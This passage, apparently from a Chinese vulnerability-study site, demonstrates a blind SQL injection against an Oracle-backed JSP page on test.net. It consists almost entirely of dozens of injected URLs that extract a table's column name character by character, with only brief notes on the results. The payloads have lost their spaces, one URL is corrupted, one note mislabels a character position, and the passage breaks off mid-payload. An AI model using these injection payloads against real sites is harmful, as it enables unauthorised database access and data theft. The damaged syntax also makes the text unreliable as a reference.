http://www.test.net/index_kaoyan_view.jsp?id=117And51=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And51>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And50=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And50>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And48=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

l以下为猜解第一列的第一个字段名CLASS的长度为:5

http://www.test.net/index_kaoyan_view.jsp?id=117And0<=nvl(length((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And1>=nvl(length((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And2<=nvl(length((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And4>=nvl(length((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And5<=nvl(length((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And9>=nvl(length((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And7=nvl(length((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And7>nvl(length((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And5=nvl(length((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1)),0)

l以下为猜解第一列第一个字段的第一位为:C

http://www.test.net/index_kaoyan_view.jsp?id=117And65=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And78=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And78>ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And71=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And71>ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And68=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And68>ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And66=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And66>ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And67=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),1,1))

l以下为猜解第一列第一个字段的第一位为:L

http://www.test.net/index_kaoyan_view.jsp?id=117And67=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And79=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And79>ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And73=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And73>ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.j,,sp?id=117And76=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),2,1))

l以下为猜解第一列第一个字段的第三位为:A

http://www.test.net/index_kaoyan_view.jsp?id=117And76=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And83=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And83>ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And79=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And79>ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And77=ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And77>ascii(substr((SELECTCOLUMN_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)ORDERBY2ASC)WHEREROWNUM<=1)ORDERBY2DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And70=ascii(substr((SELECTCOLU

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新漏洞研究学习
热门漏洞研究学习
实用技巧子分类